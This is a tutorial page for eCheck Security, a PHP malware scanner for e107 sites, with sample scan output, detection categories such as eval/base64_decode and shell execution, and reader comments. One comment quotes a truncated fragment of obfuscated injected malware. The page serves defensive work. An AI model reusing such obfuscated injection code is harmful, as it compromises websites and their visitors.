eCheck Seciruty is a tiny tool for detecting malicious PHP scripts and code portions on your website. It was originally build to check e107 CMS based sites, but it can be actually used on any kind of PHP based projects.
This tool is licensed under GNU General Public License - http://www.gnu.org/licenses/gpl.txt
Before you start using the tool, I have to warn you - DON'T PANIC when you first see the 'suspicious' results. Be sure you read the 'Analyzing the results' chapter.
Download most recent version of eCheck Seciruty here
Shell script (echeck.php)
Copy echeck.php somewhere on your server. In this example I'm copying it in /home/secretr/
[secretr@SecretR /]$ cd /home/secretr/ [secretr@SecretR ~]$ ./echeck.php -v eCheck 1.0 beta Report issues or get help on http://free-source.net or irc://irc.freenode.org/e107 [secretr@SecretR ~]$
You can always get quick help
[secretr@SecretR ~]$ ./echeck.php -v eCheck 1.0 beta Report issues or get help on http://free-source.net or irc://irc.freenode.org/e107 [secretr@SecretR ~]$ ./echeck.php -h This is a command line PHP script for checking for/cleaning PHP malicious code. Usage:./echeck.php [options] /path/to/wwwroot Options: -v Script version -I Output a list with infected files only -S Output a list with suspected files only -C Clean files (MAKE A BACKUP BEFORE DOING THIS), confirmation is required -r number Directory depth level [secretr@SecretR ~]$
Now, the only thing you need to know is the path to your web root (e107 root for e107 user). In my case this is /home/secretr/public_html and my e107 Installation is located in e107_0.7 folder. There are two alternatives. You could let eCheck know the path to your web root:
$ ./echeck.php -I -S ./public_html/e107_0.7/
or the opposite - navigate to web root and call the script with the proper path:
[secretr@SecretR ~]$ cd public_html/e107_0.7/ [secretr@SecretR e107_0.7]$ /home/secretr/./echeck.php -I -S ./
Here is the output of eCheck scan on fresh e107 v0.7 CVS copy:
[secretr@SecretR ~]$ ./echeck.php -I -S -r 10 ./public_html/e107_0.7/ Directory depth set to 10 ./public_html/e107_0.7/backend.php...SUSPECTED (shell execution) ./public_html/e107_0.7/e107_plugins/pdf/pdf.sc...SUSPECTED (shell execution) ./public_html/e107_0.7/e107_handlers/resize_handler.php...SUSPECTED (shell execution) Files checked: 1040 Files suspected: 3 Files infected: 0 Files cleaned: 0 Clean errors: 0 Clean warnings: 0 NOTE: SUSPECTED DOES N0T MEAN INFECTED! DIFF AGAINST TRUSTED COPY OF SUSPECTED FILES TO BE SURE EVERYTHING IS OK. SUSPECTED FILES ARE NOT CLEANED! [secretr@SecretR ~]$
There is (still experimental) cleanup option you could try if eCheck finds files marked as INFECTED. I recommend to make a backup of your files first. Additionally, you need write permission on all checked files (e.g. run eCheck as root) and your PHP version should be at least 5.0.
I'll put infected and real malicious files inside my local e107 system to show you what happens:
[secretr@SecretR ~]$ ./echeck.php -C -I -S ./public_html/e107_0.7/ Directory depth set to 100 Did you make a backup? Be sure you did it! Type 'yes' to continue:
You need to confirm (type yes and press enter) to continue the operation
[secretr@SecretR ~]$ ./echeck.php -C -I -S ./public_html/e107_0.7/ Directory depth set to 100 Did you make a backup? Be sure you did it! Type 'yes' to continue: yes ./public_html/e107_0.7/echeckwww.php...SUSPECTED (eval/base64_decode found) ./public_html/e107_0.7/backend.php...SUSPECTED (shell execution) ./public_html/e107_0.7/index.php...INFECTED...CLEANED ./public_html/e107_0.7/e107_plugins/pdf/pdf.sc...SUSPECTED (shell execution) ./public_html/e107_0.7/e107_files/public/shell.php...SUSPECTED (eval/base64_decode found) ./public_html/e107_0.7/e107_handlers/resize_handler.php...SUSPECTED (shell execution) Files checked: 1043 Files suspected: 5 Files infected: 1 Files cleaned: 1 Clean errors: 0 Clean warnings: 0 NOTE: SUSPECTED DOES NOT MEAN INFECTED! DIFF AGAINST TRUSTED COPY OF SUSPECTED FILES TO BE SURE EVERYTHING IS OK. SUSPECTED FILES ARE NOT CLEANED! [secretr@SecretR ~]$
Our index.php was infected with known infection, so eCheck was able to clean it. Note we have one new line - './public_html/e107_0.7/e107_files/public/shell.php'. We'll talk about this one later.
One last example - let's execute eCheck as root (your current user should be sudoer), output everything (all checked files) and write the output to a file - log.txt in our case.
[secretr@SecretR ~]$sudo ./echeck.php ./public_html/e107_0.7/ > ./log.txt [secretr@SecretR ~]$cat log.txt | more Directory depth set to 100 ./public_html/e107_0.7/install_.php....CHECKING...OK ./public_html/e107_0.7/user.php....CHECKING...OK ./public_html/e107_0.7/rate.php....CHECKING...OK ./public_html/e107_0.7/search.php....CHECKING...OK ./public_html/e107_0.7/online.php....CHECKING...OK ./public_html/e107_0.7/fpw.php....CHECKING...OK ./public_html/e107_0.7/print.php....CHECKING...OK ./public_html/e107_0.7/upload.php....CHECKING...OK ./public_html/e107_0.7/page.php....CHECKING...OK ./public_html/e107_0.7/links.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_notify.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_np.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_usersettings.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_membersonly.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_sitelinks.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_upload_handler.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_fpw.php....CHECKING...OK ./public_html/e107_0.7/e107_languages/English/lan_download.php....CHECKING...OK --More--
Scan via a browser (echeckwww.php)
For those who don't have shell access to their sites (most common case for shared hosting) there is an alternative.
Copy echeckwww.php to your site root (in my case /home/secretr/public_html/e107_0.7/) and just call it in your favorite browser like this:
You should see something like this (click to enlarge)
Keep in mind you don't have any options you can set in this case. Auto-clean is not available as well
Analyzing the results
Scripts are analyzed in two ways:
Suspected doesn't mean files are infected in some way. Most of the phrases (generic php functions) are used in all kind of software. The process of analyzing the results is your responsibility. If you know the structure of your site, and you have generic knowledge of 'what, where happens', it would be easy to identify the problems (if there are any).
I'll use the example above, more precisely this line from our latest shell example:
./public_html/e107_0.7/e107_files/public/shell.php...SUSPECTED (eval/base64_decode found)
Every e107 user should know that /e107_files/public/ folder should not contain any scripts. Experienced admins would know what to do from now on - checking the file last modified date and investigating the Apache logs to find out how was this file uploaded on the server, eventually reporting the problem to e107 core team.
In other hand we see
./public_html/e107_0.7/backend.php...SUSPECTED (shell execution) ./public_html/e107_0.7/e107_plugins/pdf/pdf.sc...SUSPECTED (shell execution) ./public_html/e107_0.7/e107_handlers/resize_handler.php...SUSPECTED (shell execution)
lines are appearing on and on. These are the false positives I'm talking about. You'll have many of them on a live site with a lot of 3rd party code. You just need to investigate all you see - it's pretty easy to distinguish malicious from creative code.
Where can I get help?
Site Blog - Security
Excellent tool and just what I was looking for. Would also be good if it didn't just scan the e107 root folder but all virtual servers so it could be scheduled to run daily and send reports to server admin. Would also be good to be able to exclude files from scanning that we know are safe.
eCheck Security PHP tool - find malware on your site
How many way that hacker can upload their code to our website?
eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZmZ 0MScpKXtmdW5jdGlvbiBmZnQxKCRzKXtpZihwcmVnX21h dGNoX2FsbCgnIzxzY3JpcHQoLio
I wonder why, they can add the code to mu website;
or they have my password, or they other way to upload the code to my hosting
Please guide me
You must be logged in to make comments on this site - please log in, or if you are not registered click here to signup